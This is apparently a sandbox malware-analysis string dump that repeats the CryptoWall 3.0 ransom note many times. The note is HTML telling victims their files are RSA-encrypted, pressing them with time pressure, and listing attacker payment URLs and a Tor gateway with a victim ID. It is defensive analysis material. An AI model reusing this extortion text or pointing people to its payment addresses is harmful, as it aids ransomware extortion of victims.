Source: restore_files_gpmus.html203.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt264.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html322.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html248.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html273.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt196.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html361.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt347.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt78.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt340.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt105.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html150.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html168.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt393.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt198.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html88.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html145.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html343.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt269.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html10.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html142.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
